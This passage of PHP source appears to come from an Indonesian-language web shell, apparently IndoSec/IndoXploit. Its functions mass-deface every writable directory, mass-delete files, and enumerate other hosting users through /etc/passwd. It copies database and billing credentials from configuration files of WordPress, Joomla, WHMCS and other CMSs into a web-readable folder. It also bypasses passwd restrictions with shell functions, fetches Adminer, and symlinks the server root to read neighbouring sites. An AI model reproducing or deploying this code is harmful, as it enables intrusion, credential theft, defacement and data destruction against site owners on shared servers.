812.  
813. if ($_POST['ya']) {
814. if(is_dir($dir)) {
815. if(is_writable($dir)) {
816. @rmdir($dir);
817. @exe("rm -rf $dir");
818. @exe("rmdir /s /q $dir");
819. $swa = "success";
820. $text = "Berhasil Menghapus";
821. $dir = dirname($dir);
822. swall($swa,$text,$dir);
823. } else {
824. $swa = "error";
825. $text = "Berhasil Menghapus";
826. $dir = dirname($dir);
827. swall($swa,$text,$dir);
828. }
829. }
830. }
831. exit;
832. }
833.  
834.  
835. /*
836. * Fungsi_Tambahan
837. *
838. *
839. * Mass Deface
840. * IndoXploit
841. */
842. if($_GET['aksi'] == 'masdef') {
843. function tipe_massal($dir,$namafile,$isi_script) {
844. if(is_writable($dir)) {
845. $dira = scandir($dir);
846. foreach($dira as $dirb) {
847. $dirc = "$dir/$dirb";
848. $lokasi = $dirc.'/'.$namafile;
849. if($dirb === '.') {
850. file_put_contents($lokasi, $isi_script);
851. } elseif($dirb === '..') {
852. file_put_contents($lokasi, $isi_script);
853. } else {
854. if(is_dir($dirc)) {
855. if(is_writable($dirc)) {
856. echo "Done > $lokasi\n";
857. file_put_contents($lokasi, $isi_script);
858. $masdef = tipe_massal($dirc,$namafile,$isi_script);
859. }
860. }
861. }
862. }
863. }
864. }
865.  
866. function tipe_biasa($dir,$namafile,$isi_script) {
867. if(is_writable($dir)) {
868. $dira = scandir($dir);
869. foreach($dira as $dirb) {
870. $dirc = "$dir/$dirb";
871. $lokasi = $dirc.'/'.$namafile;
872. if($dirb === '.') {
873. file_put_contents($lokasi, $isi_script);
874. } elseif($dirb === '..') {
875. file_put_contents($lokasi, $isi_script);
876. } else {
877. if(is_dir($dirc)) {
878. if(is_writable($dirc)) {
879. echo "Done > $dirb/$namafile\n";
880. file_put_contents($lokasi, $isi_script);
881. }
882. }
883. }
884. }
885. }
886. }
887.  
888. if($_POST['start']) {
889. echo "[ <a href='?dir=$dir'>Kembali</a> ]
890. <textarea class='form-control' rows='13' disabled=''>";
891. if($_POST['tipe'] == 'mahal') {
892. tipe_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
893. } elseif($_POST['tipe'] == 'murah') {
894. tipe_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
895. }
896. echo "</textarea><br/>";
897. } else {
898. echo "<form method='post'>
899. <center>
900. <h5>Tipe :</h5>
901. <input id='toggle-on' class='toggle toggle-left' name='tipe' value='murah' type='radio' checked>
902. <label for='toggle-on' class='butn'>Biasa</label>
903. <input id='toggle-off' class='toggle toggle-right' name='tipe' value='mahal' type='radio'>
904. <label for='toggle-off' class='butn'>Masal</label>
905. </center>
906. <h5>$imgfol Lokasi :</h5>
907. <input type='text' name='d_dir' value='$dir' class='form-control'><br>
908. <h5>$imgfile Nama File :</h5>
909. <input type='text' name='d_file' placeholder='[Ex] index.php' class='form-control'><br/>
910. <h5>$imgfile Isi File :</h5>
911. <textarea name='script' class='form-control' rows='13' placeholder='[Ex] Hacked By { IndoSec }'></textarea><br/>
912. <input type='submit' name='start' value='Mass Deface' class='btn btn-danger form-control'><br/>
913. </form>";
914. }
915. exit;
916. }
917.  
918.  
919. /*
920. * mass delete
921. * IndoXploit
922. */
923. if($_GET['aksi'] == 'masdel') {
924. function hapus_massal($dir,$namafile) {
925. if(is_writable($dir)) {
926. $dira = scandir($dir);
927. foreach($dira as $dirb) {
928. $dirc = "$dir/$dirb";
929. $lokasi = $dirc.'/'.$namafile;
930. if($dirb === '.') {
931. if(file_exists("$dir/$namafile")) {
932. unlink("$dir/$namafile");
933. }
934. } elseif($dirb === '..') {
935. if(file_exists("".dirname($dir)."/$namafile")) {
936. unlink("".dirname($dir)."/$namafile");
937. }
938. } else {
939. if(is_dir($dirc)) {
940. if(is_writable($dirc)) {
941. if($lokasi) {
942. echo "$lokasi > Terhapus\n";
943. unlink($lokasi);
944. $massdel = hapus_massal($dirc,$namafile);
945. }
946. }
947. }
948. }
949. }
950. }
951. }
952.  
953. if($_POST['start']) {
954. echo "[ <a href='?dir=$dir'>Kembali</a> ]
955. <textarea class='form-control' rows='13' disabled=''>";
956. hapus_massal($_POST['d_dir'], $_POST['d_file']);
957. echo "</textarea><br/>";
958. } else {
959. echo "<form method='post'>
960. <h5>$imgfol Lokasi :</h5>
961. <input type='text' name='d_dir' value='$dir' class='form-control'><br/>
962. <h5>$imgfile Nama File :</h5>
963. <input type='text' name='d_file' placeholder='[Ex] index.php' class='form-control'><br/>
964. <input type='submit' name='start' value='Delete!!' class='btn btn-danger form-control'>
965. </form>";
966. }
967. exit;
968. }
969.  
970.  
971. /*
972. * Jumping
973. * IndoXploit
974. */
975. if($_GET['aksi'] == 'jumping') {
976. $i = 0;
977. echo "<div class='card container'>";
978. if(preg_match("/hsphere/", $dir)) {
979. $urls = explode("\r\n", $_POST['url']);
980. if(isset($_POST['jump'])) {
981. echo "<pre>";
982. foreach($urls as $url) {
983. $url = str_replace(array("http://","www."), "", strtolower($url));
984. $etc = "/etc/passwd";
985. $f = fopen($etc,"r");
986. while($gets = fgets($f)) {
987. $pecah = explode(":", $gets);
988. $user = $pecah[0];
989. $dir_user = "/hsphere/local/home/$user";
990. if(is_dir($dir_user) === true) {
991. $url_user = $dir_user."/".$url;
992. if(is_readable($url_user)) {
993. $i++;
994. $jrw = "[<font color=green>R</font>] <a href='?dir=$url_user'><font color=#0046FF>$url_user</font></a>";
995. if(is_writable($url_user)) {
996. $jrw = "[<font color=green>RW</font>] <a href='?dir=$url_user'><font color=#0046FF>$url_user</font></a>";
997. }
998. echo $jrw."<br>";
999. }
1000. }
1001. }
1002. }
1003. if($i == 0) {
1004. } else {
1005. echo "<br>Total ada ".$i." Kamar di ".$ip;
1006. }
1007. echo "</pre>";
1008. } else {
1009. echo '<center>
1010. <form method="post">
1011. List Domains: <br>
1012. <textarea name="url" class="form-control">';
1013. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
1014. while($getss = fgets($fp)) {
1015. echo $getss;
1016. }
1017. echo '</textarea><br>
1018. <input type="submit" value="Jumping" name="jump" class="btn btn-danger btn-block">
1019. </form></center>';
1020. }
1021. } elseif(preg_match("/vhosts/", $dir)) {
1022. $urls = explode("\r\n", $_POST['url']);
1023. if(isset($_POST['jump'])) {
1024. echo "<pre>";
1025. foreach($urls as $url) {
1026. $web_vh = "/var/www/vhosts/$url/httpdocs";
1027. if(is_dir($web_vh) === true) {
1028. if(is_readable($web_vh)) {
1029. $i++;
1030. $jrw = "[<font color=green>R</font>] <a href='?dir=$web_vh'><font color=#0046FF>$web_vh</font></a>";
1031. if(is_writable($web_vh)) {
1032. $jrw = "[<font color=green>RW</font>] <a href='?dir=$web_vh'><font color=#0046FF>$web_vh</font></a>";
1033. }
1034. echo $jrw."<br>";
1035. }
1036. }
1037. }
1038. if($i == 0) {
1039. } else {
1040. echo "<br>Total ada ".$i." Kamar di ".$ip;
1041. }
1042. echo "</pre>";
1043. } else {
1044. echo '<center>
1045. <form method="post">
1046. List Domains: <br>
1047. <textarea name="url" class="form-control">';
1048. bing("ip:$ip");
1049. echo '</textarea><br>
1050. <input type="submit" value="Jumping" name="jump" class="btn btn-danger btn-block">
1051.  
1052. </form></center>';
1053. }
1054. } else {
1055. echo "<pre>";
1056. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font><br/>");
1057. while($passwd = fgets($etc)) {
1058. if($passwd == '' || !$etc) {
1059. echo "<font color=red>Can't read /etc/passwd</font><br/>";
1060. } else {
1061. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
1062. foreach($user_jumping[1] as $user_pro_jump) {
1063. $user_jumping_dir = "/home/$user_pro_jump/public_html";
1064. if(is_readable($user_jumping_dir)) {
1065. $i++;
1066. $jrw = "[<font color=green>R</font>] <a href='?dir=$user_jumping_dir'><font color=#0046FF>$user_jumping_dir</font></a>";
1067. if(is_writable($user_jumping_dir)) {
1068. $jrw = "[<font color=green>RW</font>] <a href='?dir=$user_jumping_dir'><font color=#0046FF>$user_jumping_dir</font></a>";
1069. }
1070. echo $jrw;
1071. if(function_exists('posix_getpwuid')) {
1072. $domain_jump = file_get_contents("/etc/named.conf");
1073. if($domain_jump == '') {
1074. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
1075. } else {
1076. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
1077. foreach($domains_jump[1] as $dj) {
1078. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1079. $user_jumping_url = $user_jumping_url['name'];
1080. if($user_jumping_url == $user_pro_jump) {
1081. echo " => ( <u>$dj</u> )<br>";
1082. break;
1083. }
1084. }
1085. }
1086. } else {
1087. echo "<br>";
1088. }
1089. }
1090. }
1091. }
1092. }
1093. if($i == 0) {
1094. } else {
1095. echo "<br>Total ada ".$i." Kamar di ".$ip;
1096. }
1097. echo "</pre>";
1098. }
1099. echo "</div><br/>";
1100. exit;
1101. }
1102.  
1103. /*
1104. Config
1105. */
1106. if($_GET['aksi'] == 'config') {
1107. if($_POST){
1108. $passwd = $_POST['passwd'];
1109. mkdir("indosec_config", 0777);
1110. $isi_htc = "Options allnRequire NonenSatisfy Any";
1111. $htc = fopen("indosec_config/.htaccess","w");
1112. fwrite($htc, $isi_htc);
1113. preg_match_all('/(.*?):x:/', $passwd, $user_config);
1114. foreach($user_config[1] as $user_con) {
1115. $user_config_dir = "/home/$user_con/public_html/";
1116. if(is_readable($user_config_dir)) {
1117. $grab_config = array(
1118. "/home/$user_con/.my.cnf" => "cpanel",
1119. "/home/$user_con/public_html/config/koneksi.php" => "Lokomedia",
1120. "/home/$user_con/public_html/forum/config.php" => "phpBB",
1121. "/home/$user_con/public_html/sites/default/settings.php" => "Drupal",
1122. "/home/$user_con/public_html/config/settings.inc.php" => "PrestaShop",
1123. "/home/$user_con/public_html/app/etc/local.xml" => "Magento",
1124. "/home/$user_con/public_html/admin/config.php" => "OpenCart",
1125. "/home/$user_con/public_html/application/config/database.php" => "Ellislab",
1126. "/home/$user_con/public_html/vb/includes/config.php" => "Vbulletin",
1127. "/home/$user_con/public_html/includes/config.php" => "Vbulletin",
1128. "/home/$user_con/public_html/forum/includes/config.php" => "Vbulletin",
1129. "/home/$user_con/public_html/forums/includes/config.php" => "Vbulletin",
1130. "/home/$user_con/public_html/cc/includes/config.php" => "Vbulletin",
1131. "/home/$user_con/public_html/inc/config.php" => "MyBB",
1132. "/home/$user_con/public_html/includes/configure.php" => "OsCommerce",
1133. "/home/$user_con/public_html/shop/includes/configure.php" => "OsCommerce",
1134. "/home/$user_con/public_html/os/includes/configure.php" => "OsCommerce",
1135. "/home/$user_con/public_html/oscom/includes/configure.php" => "OsCommerce",
1136. "/home/$user_con/public_html/products/includes/configure.php" => "OsCommerce",
1137. "/home/$user_con/public_html/cart/includes/configure.php" => "OsCommerce",
1138. "/home/$user_con/public_html/inc/conf_global.php" => "IPB",
1139. "/home/$user_con/public_html/wp-config.php" => "Wordpress",
1140. "/home/$user_con/public_html/wp/test/wp-config.php" => "Wordpress",
1141. "/home/$user_con/public_html/blog/wp-config.php" => "Wordpress",
1142. "/home/$user_con/public_html/beta/wp-config.php" => "Wordpress",
1143. "/home/$user_con/public_html/portal/wp-config.php" => "Wordpress",
1144. "/home/$user_con/public_html/site/wp-config.php" => "Wordpress",
1145. "/home/$user_con/public_html/wp/wp-config.php" => "Wordpress",
1146. "/home/$user_con/public_html/WP/wp-config.php" => "Wordpress",
1147. "/home/$user_con/public_html/news/wp-config.php" => "Wordpress",
1148. "/home/$user_con/public_html/wordpress/wp-config.php" => "Wordpress",
1149. "/home/$user_con/public_html/test/wp-config.php" => "Wordpress",
1150. "/home/$user_con/public_html/demo/wp-config.php" => "Wordpress",
1151. "/home/$user_con/public_html/home/wp-config.php" => "Wordpress",
1152. "/home/$user_con/public_html/v1/wp-config.php" => "Wordpress",
1153. "/home/$user_con/public_html/v2/wp-config.php" => "Wordpress",
1154. "/home/$user_con/public_html/press/wp-config.php" => "Wordpress",
1155. "/home/$user_con/public_html/new/wp-config.php" => "Wordpress",
1156. "/home/$user_con/public_html/blogs/wp-config.php" => "Wordpress",
1157. "/home/$user_con/public_html/configuration.php" => "Joomla",
1158. "/home/$user_con/public_html/blog/configuration.php" => "Joomla",
1159. "/home/$user_con/public_html/submitticket.php" => "^WHMCS",
1160. "/home/$user_con/public_html/cms/configuration.php" => "Joomla",
1161. "/home/$user_con/public_html/beta/configuration.php" => "Joomla",
1162. "/home/$user_con/public_html/portal/configuration.php" => "Joomla",
1163. "/home/$user_con/public_html/site/configuration.php" => "Joomla",
1164. "/home/$user_con/public_html/main/configuration.php" => "Joomla",
1165. "/home/$user_con/public_html/home/configuration.php" => "Joomla",
1166. "/home/$user_con/public_html/demo/configuration.php" => "Joomla",
1167. "/home/$user_con/public_html/test/configuration.php" => "Joomla",
1168. "/home/$user_con/public_html/v1/configuration.php" => "Joomla",
1169. "/home/$user_con/public_html/v2/configuration.php" => "Joomla",
1170. "/home/$user_con/public_html/joomla/configuration.php" => "Joomla",
1171. "/home/$user_con/public_html/new/configuration.php" => "Joomla",
1172. "/home/$user_con/public_html/WHMCS/submitticket.php" => "WHMCS",
1173. "/home/$user_con/public_html/whmcs1/submitticket.php" => "WHMCS",
1174. "/home/$user_con/public_html/Whmcs/submitticket.php" => "WHMCS",
1175. "/home/$user_con/public_html/whmcs/submitticket.php" => "WHMCS",
1176. "/home/$user_con/public_html/whmcs/submitticket.php" => "WHMCS",
1177. "/home/$user_con/public_html/WHMC/submitticket.php" => "WHMCS",
1178. "/home/$user_con/public_html/Whmc/submitticket.php" => "WHMCS",
1179. "/home/$user_con/public_html/whmc/submitticket.php" => "WHMCS",
1180. "/home/$user_con/public_html/WHM/submitticket.php" => "WHMCS",
1181. "/home/$user_con/public_html/Whm/submitticket.php" => "WHMCS",
1182. "/home/$user_con/public_html/whm/submitticket.php" => "WHMCS",
1183. "/home/$user_con/public_html/HOST/submitticket.php" => "WHMCS",
1184. "/home/$user_con/public_html/Host/submitticket.php" => "WHMCS",
1185. "/home/$user_con/public_html/host/submitticket.php" => "WHMCS",
1186. "/home/$user_con/public_html/SUPPORTES/submitticket.php" => "WHMCS",
1187. "/home/$user_con/public_html/Supportes/submitticket.php" => "WHMCS",
1188. "/home/$user_con/public_html/supportes/submitticket.php" => "WHMCS",
1189. "/home/$user_con/public_html/domains/submitticket.php" => "WHMCS",
1190. "/home/$user_con/public_html/domain/submitticket.php" => "WHMCS",
1191. "/home/$user_con/public_html/Hosting/submitticket.php" => "WHMCS",
1192. "/home/$user_con/public_html/HOSTING/submitticket.php" => "WHMCS",
1193. "/home/$user_con/public_html/hosting/submitticket.php" => "WHMCS",
1194. "/home/$user_con/public_html/CART/submitticket.php" => "WHMCS",
1195. "/home/$user_con/public_html/Cart/submitticket.php" => "WHMCS",
1196. "/home/$user_con/public_html/cart/submitticket.php" => "WHMCS",
1197. "/home/$user_con/public_html/ORDER/submitticket.php" => "WHMCS",
1198. "/home/$user_con/public_html/Order/submitticket.php" => "WHMCS",
1199. "/home/$user_con/public_html/order/submitticket.php" => "WHMCS",
1200. "/home/$user_con/public_html/CLIENT/submitticket.php" => "WHMCS",
1201. "/home/$user_con/public_html/Client/submitticket.php" => "WHMCS",
1202. "/home/$user_con/public_html/client/submitticket.php" => "WHMCS",
1203. "/home/$user_con/public_html/CLIENTAREA/submitticket.php" => "WHMCS",
1204. "/home/$user_con/public_html/Clientarea/submitticket.php" => "WHMCS",
1205. "/home/$user_con/public_html/clientarea/submitticket.php" => "WHMCS",
1206. "/home/$user_con/public_html/SUPPORT/submitticket.php" => "WHMCS",
1207. "/home/$user_con/public_html/Support/submitticket.php" => "WHMCS",
1208. "/home/$user_con/public_html/support/submitticket.php" => "WHMCS",
1209. "/home/$user_con/public_html/BILLING/submitticket.php" => "WHMCS",
1210. "/home/$user_con/public_html/Billing/submitticket.php" => "WHMCS",
1211. "/home/$user_con/public_html/billing/submitticket.php" => "WHMCS",
1212. "/home/$user_con/public_html/BUY/submitticket.php" => "WHMCS",
1213. "/home/$user_con/public_html/Buy/submitticket.php" => "WHMCS",
1214. "/home/$user_con/public_html/buy/submitticket.php" => "WHMCS",
1215. "/home/$user_con/public_html/MANAGE/submitticket.php" => "WHMCS",
1216. "/home/$user_con/public_html/Manage/submitticket.php" => "WHMCS",
1217. "/home/$user_con/public_html/manage/submitticket.php" => "WHMCS",
1218. "/home/$user_con/public_html/CLIENTSUPPORT/submitticket.php" => "WHMCS",
1219. "/home/$user_con/public_html/ClientSupport/submitticket.php" => "WHMCS",
1220. "/home/$user_con/public_html/Clientsupport/submitticket.php" => "WHMCS",
1221. "/home/$user_con/public_html/clientsupport/submitticket.php" => "WHMCS",
1222. "/home/$user_con/public_html/CHECKOUT/submitticket.php" => "WHMCS",
1223. "/home/$user_con/public_html/Checkout/submitticket.php" => "WHMCS",
1224. "/home/$user_con/public_html/checkout/submitticket.php" => "WHMCS",
1225. "/home/$user_con/public_html/BILLINGS/submitticket.php" => "WHMCS",
1226. "/home/$user_con/public_html/Billings/submitticket.php" => "WHMCS",
1227. "/home/$user_con/public_html/billings/submitticket.php" => "WHMCS",
1228. "/home/$user_con/public_html/BASKET/submitticket.php" => "WHMCS",
1229. "/home/$user_con/public_html/Basket/submitticket.php" => "WHMCS",
1230. "/home/$user_con/public_html/basket/submitticket.php" => "WHMCS",
1231. "/home/$user_con/public_html/SECURE/submitticket.php" => "WHMCS",
1232. "/home/$user_con/public_html/Secure/submitticket.php" => "WHMCS",
1233. "/home/$user_con/public_html/secure/submitticket.php" => "WHMCS",
1234. "/home/$user_con/public_html/SALES/submitticket.php" => "WHMCS",
1235. "/home/$user_con/public_html/Sales/submitticket.php" => "WHMCS",
1236. "/home/$user_con/public_html/sales/submitticket.php" => "WHMCS",
1237. "/home/$user_con/public_html/BILL/submitticket.php" => "WHMCS",
1238. "/home/$user_con/public_html/Bill/submitticket.php" => "WHMCS",
1239. "/home/$user_con/public_html/bill/submitticket.php" => "WHMCS",
1240. "/home/$user_con/public_html/PURCHASE/submitticket.php" => "WHMCS",
1241. "/home/$user_con/public_html/Purchase/submitticket.php" => "WHMCS",
1242. "/home/$user_con/public_html/purchase/submitticket.php" => "WHMCS",
1243. "/home/$user_con/public_html/ACCOUNT/submitticket.php" => "WHMCS",
1244. "/home/$user_con/public_html/Account/submitticket.php" => "WHMCS",
1245. "/home/$user_con/public_html/account/submitticket.php" => "WHMCS",
1246. "/home/$user_con/public_html/USER/submitticket.php" => "WHMCS",
1247. "/home/$user_con/public_html/User/submitticket.php" => "WHMCS",
1248. "/home/$user_con/public_html/user/submitticket.php" => "WHMCS",
1249. "/home/$user_con/public_html/CLIENTS/submitticket.php" => "WHMCS",
1250. "/home/$user_con/public_html/Clients/submitticket.php" => "WHMCS",
1251. "/home/$user_con/public_html/clients/submitticket.php" => "WHMCS",
1252. "/home/$user_con/public_html/BILLINGS/submitticket.php" => "WHMCS",
1253. "/home/$user_con/public_html/Billings/submitticket.php" => "WHMCS",
1254. "/home/$user_con/public_html/billings/submitticket.php" => "WHMCS",
1255. "/home/$user_con/public_html/MY/submitticket.php" => "WHMCS",
1256. "/home/$user_con/public_html/My/submitticket.php" => "WHMCS",
1257. "/home/$user_con/public_html/my/submitticket.php" => "WHMCS",
1258. "/home/$user_con/public_html/secure/whm/submitticket.php" => "WHMCS",
1259. "/home/$user_con/public_html/secure/whmcs/submitticket.php" => "WHMCS",
1260. "/home/$user_con/public_html/panel/submitticket.php" => "WHMCS",
1261. "/home/$user_con/public_html/clientes/submitticket.php" => "WHMCS",
1262. "/home/$user_con/public_html/cliente/submitticket.php" => "WHMCS",
1263. "/home/$user_con/public_html/support/order/submitticket.php" => "WHMCS",
1264. "/home/$user_con/public_html/bb-config.php" => "BoxBilling",
1265. "/home/$user_con/public_html/boxbilling/bb-config.php" => "BoxBilling",
1266. "/home/$user_con/public_html/box/bb-config.php" => "BoxBilling",
1267. "/home/$user_con/public_html/host/bb-config.php" => "BoxBilling",
1268. "/home/$user_con/public_html/Host/bb-config.php" => "BoxBilling",
1269. "/home/$user_con/public_html/supportes/bb-config.php" => "BoxBilling",
1270. "/home/$user_con/public_html/support/bb-config.php" => "BoxBilling",
1271. "/home/$user_con/public_html/hosting/bb-config.php" => "BoxBilling",
1272. "/home/$user_con/public_html/cart/bb-config.php" => "BoxBilling",
1273. "/home/$user_con/public_html/order/bb-config.php" => "BoxBilling",
1274. "/home/$user_con/public_html/client/bb-config.php" => "BoxBilling",
1275. "/home/$user_con/public_html/clients/bb-config.php" => "BoxBilling",
1276. "/home/$user_con/public_html/cliente/bb-config.php" => "BoxBilling",
1277. "/home/$user_con/public_html/clientes/bb-config.php" => "BoxBilling",
1278. "/home/$user_con/public_html/billing/bb-config.php" => "BoxBilling",
1279. "/home/$user_con/public_html/billings/bb-config.php" => "BoxBilling",
1280. "/home/$user_con/public_html/my/bb-config.php" => "BoxBilling",
1281. "/home/$user_con/public_html/secure/bb-config.php" => "BoxBilling",
1282. "/home/$user_con/public_html/support/order/bb-config.php" => "BoxBilling",
1283. "/home/$user_con/public_html/includes/dist-configure.php" => "Zencart",
1284. "/home/$user_con/public_html/zencart/includes/dist-configure.php" => "Zencart",
1285. "/home/$user_con/public_html/products/includes/dist-configure.php" => "Zencart",
1286. "/home/$user_con/public_html/cart/includes/dist-configure.php" => "Zencart",
1287. "/home/$user_con/public_html/shop/includes/dist-configure.php" => "Zencart",
1288. "/home/$user_con/public_html/includes/iso4217.php" => "Hostbills",
1289. "/home/$user_con/public_html/hostbills/includes/iso4217.php" => "Hostbills",
1290. "/home/$user_con/public_html/host/includes/iso4217.php" => "Hostbills",
1291. "/home/$user_con/public_html/Host/includes/iso4217.php" => "Hostbills",
1292. "/home/$user_con/public_html/supportes/includes/iso4217.php" => "Hostbills",
1293. "/home/$user_con/public_html/support/includes/iso4217.php" => "Hostbills",
1294. "/home/$user_con/public_html/hosting/includes/iso4217.php" => "Hostbills",
1295. "/home/$user_con/public_html/cart/includes/iso4217.php" => "Hostbills",
1296. "/home/$user_con/public_html/order/includes/iso4217.php" => "Hostbills",
1297. "/home/$user_con/public_html/client/includes/iso4217.php" => "Hostbills",
1298. "/home/$user_con/public_html/clients/includes/iso4217.php" => "Hostbills",
1299. "/home/$user_con/public_html/cliente/includes/iso4217.php" => "Hostbills",
1300. "/home/$user_con/public_html/clientes/includes/iso4217.php" => "Hostbills",
1301. "/home/$user_con/public_html/billing/includes/iso4217.php" => "Hostbills",
1302. "/home/$user_con/public_html/billings/includes/iso4217.php" => "Hostbills",
1303. "/home/$user_con/public_html/my/includes/iso4217.php" => "Hostbills",
1304. "/home/$user_con/public_html/secure/includes/iso4217.php" => "Hostbills",
1305. "/home/$user_con/public_html/support/order/includes/iso4217.php" => "Hostbills"
1306. );
1307. foreach($grab_config as $config => $nama_config) {
1308. $ambil_config = file_get_contents($config);
1309. if($ambil_config == '') {
1310. } else {
1311. $file_config = fopen("indosec_config/$user_con-$nama_config.txt","w");
1312. fputs($file_config,$ambil_config);
1313. }
1314. }
1315. }
1316. }
1317. echo "<p class='text-center'>Success Get Config!!</p>
1318. <a href='?dir=$dir/indosec_config' class='btn btn-success btn-block mb-4'>Click Here</a>";
1319. }else{
1320. echo "<form method='post'>
1321. <p class='text-danger'>/etc/passwd error ? <a href='?dir=".$dir."&aksi=passwbypass'>Bypass Here</a></p>
1322. <textarea name='passwd' class='form-control' rows='13'>".file_get_contents('/etc/passwd')."</textarea><br/>
1323. <input type='submit' class='btn btn-danger btn-block' value='Get Config!!'>
1324. </form>";
1325. }
1326. exit;
1327. }
1328.  
1329.  
1330. /*
1331. Bypass etc/passwd
1332. */
1333. if($_GET['aksi'] == 'passwbypass') {
1334. echo '<div claas="container">
1335. <form method="POST">
1336. <p class="text-center">Bypass etc/passwd With :</p>
1337. <div class="d-flex justify-content-center flex-wrap">
1338. <input type="submit" class="fiture btn btn-danger btn-sm" value="System Function" name="syst">
1339. <input type="submit" class="fiture btn btn-danger btn-sm" value="Passthru Function" name="passth">
1340. <input type="submit" class="fiture btn btn-danger btn-sm" value="Exec Function" name="ex">
1341. <input type="submit" class="fiture btn btn-danger btn-sm" value="Shell_exec Function" name="shex">
1342. <input type="submit" class="fiture btn btn-danger btn-sm" value="Posix_getpwuid Function" name="melex">
1343. </div><hr/>
1344. <p class="text-center">Bypass User With :</p>
1345. <div class="d-flex justify-content-center flex-wrap">
1346. <input type="submit" class="fiture btn btn-warning btn-sm" value="Awk Program" name="awkuser">
1347. <input type="submit" class="fiture btn btn-warning btn-sm" value="System Function" name="systuser">
1348. <input type="submit" class="fiture btn btn-warning btn-sm" value="Passthru Function" name="passthuser">
1349. <input type="submit" class="fiture btn btn-warning btn-sm" value="Exec Function" name="exuser">
1350. <input type="submit" class="fiture btn btn-warning btn-sm" value="Shell_exec Function" name="shexuser">
1351. </div>
1352. </form>';
1353.  
1354. $mail = 'ls /var/mail';
1355. $paswd = '/etc/passwd';
1356. if($_POST['syst']) {
1357. echo"<textarea class='form-control' rows='13'>";
1358. echo system("cat $paswd");
1359. echo"</textarea><br/>";
1360. }
1361. if($_POST['passth']) {
1362. echo"<textarea class='form-control' rows='13'>";
1363. echo passthru("cat $paswd");
1364. echo"</textarea><br/>";
1365. }
1366. if($_POST['ex']) {
1367. echo"<textarea class='form-control' rows='13'>";
1368. echo exec("cat $paswd");
1369. echo"</textarea><br/>";
1370. }
1371. if($_POST['shex']) {
1372. echo"<textarea class='form-control' rows='13'>";
1373. echo shell_exec("cat $paswd");
1374. echo"</textarea><br/>";
1375. }
1376. if($_POST['melex']) {
1377. echo"<textarea class='form-control' rows='13'>";
1378. for($uid=0;$uid<6000;$uid++){
1379. $ara = posix_getpwuid($uid);
1380. if (!empty($ara)) {
1381. while (list ($key, $val) = each($ara)){
1382. print "$val:";
1383. }
1384. print "n";
1385. }
1386. }
1387. echo"</textarea><br/>";
1388. }
1389.  
1390. if ($_POST['awkuser']) {
1391. echo"<textarea class='form-control' rows='13'>
1392. ".shell_exec("awk -F: '{ print $1 }' $paswd | sort")."
1393. </textarea><br/>";
1394. }
1395. if ($_POST['systuser']) {
1396. echo"<textarea class='form-control' rows='13'>";
1397. echo system("$mail");
1398. echo "</textarea><br>";
1399. }
1400. if ($_POST['passthuser']) {
1401. echo"<textarea class='form-control' rows='13'>";
1402. echo passthru("$mail");
1403. echo "</textarea><br>";
1404. }
1405. if ($_POST['exuser']) {
1406. echo"<textarea class='form-control' rows='13'>";
1407. echo exec("$mail");
1408. echo "</textarea><br>";
1409. }
1410. if ($_POST['shexuser']) {
1411. echo"<textarea class='form-control' rows='13'>";
1412. echo shell_exec("$mail");
1413. echo "</textarea><br>";
1414. }
1415. echo "</div>";
1416. exit;
1417. }
1418.  
1419.  
1420. /*
1421. Adminer
1422. */
1423. if($_GET['aksi'] == 'adminer') {
1424. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
1425. function adminer($url, $isi) {
1426. $fp = fopen($isi, "w");
1427. $ch = curl_init();
1428. curl_setopt($ch, CURLOPT_URL, $url);
1429. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
1430. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1431. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
1432. curl_setopt($ch, CURLOPT_FILE, $fp);
1433. return curl_exec($ch);
1434. curl_close($ch);
1435. fclose($fp);
1436. ob_flush();
1437. flush();
1438. }
1439. if(file_exists('adminer.php')) {
1440. echo "<a href='$full/adminer.php' target='_blank' class='text-center btn btn-success btn-block mb-3'>Login Adminer</a>";
1441. } else {
1442. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
1443. echo "<p class='text-center'>Berhasil Membuat Adminer</p><a href='$full/adminer.php' target='_blank' class='text-center btn btn-success btn-block mb-3'>Login Adminer</a>";
1444. } else {
1445. echo "<p class='text-center text-danger'>Gagal Membuat Adminer</p>";
1446. }
1447. }
1448. exit;
1449. }
1450.  
1451.  
1452. /*
1453. * Symlink Server
1454. * Kuda Shell
1455. */
1456. if($_GET['aksi'] == 'symlink') {
1457. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
1458. $d0mains = @file("/etc/named.conf");
1459. if(!$d0mains) {
1460. die ("[ <a href='?dir=$dir&aksi=symread'>Bypass Read</a> ] [ <a href='?dir=$dir&aksi=sym_404'>Symlink 404</a> ] [ <a href='?dir=$dir&aksi=sym_bypas'>Symlink Bypass</a> ]<br/><font color='red'>Error tidak dapat membaca /etc/named.conf</font><br/><br/>");
1461. }
1462. ##htaccess
1463. if($d0mains){
1464. @mkdir("indosec_sym",0777);
1465. @chdir("indosec_sym");
1466. @exe("ln -s / root");
1467. $file3 = 'Options Indexes FollowSymLinks
1468. DirectoryIndex indsc.html
1469. AddType text/plain php html php5 phtml
1470. AddHandler text/plain php html php5 phtml
1471. Satisfy Any';
1472. $fp3 = fopen('.htaccess','w');
1473. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
1474. echo "[ <a href='?dir=$dir&aksi=symread'>Bypass Read</a> ] [ <a href='?dir=$dir&aksi=sym_404'>Symlink 404</a> ] [ <a href='?dir=$dir&aksi=sym_bypas'>Symlink Bypass</a> ]
1475. <div class='tmp'>
1476. <table class='text-center table-responsive'>
1477. <thead class='bg-info'>
1478. <th>No.</th>
1479. <th>Domains</th>
1480. <th>Users</th>
1481. <th>symlink </th>
1482. </thead>";
1483. $dcount = 1;
1484. foreach($d0mains as $d0main){
1485. if(eregi("zone",$d0main)){
1486. preg_match_all('#zone "(.*)"#', $d0main, $domains);
1487. flush();
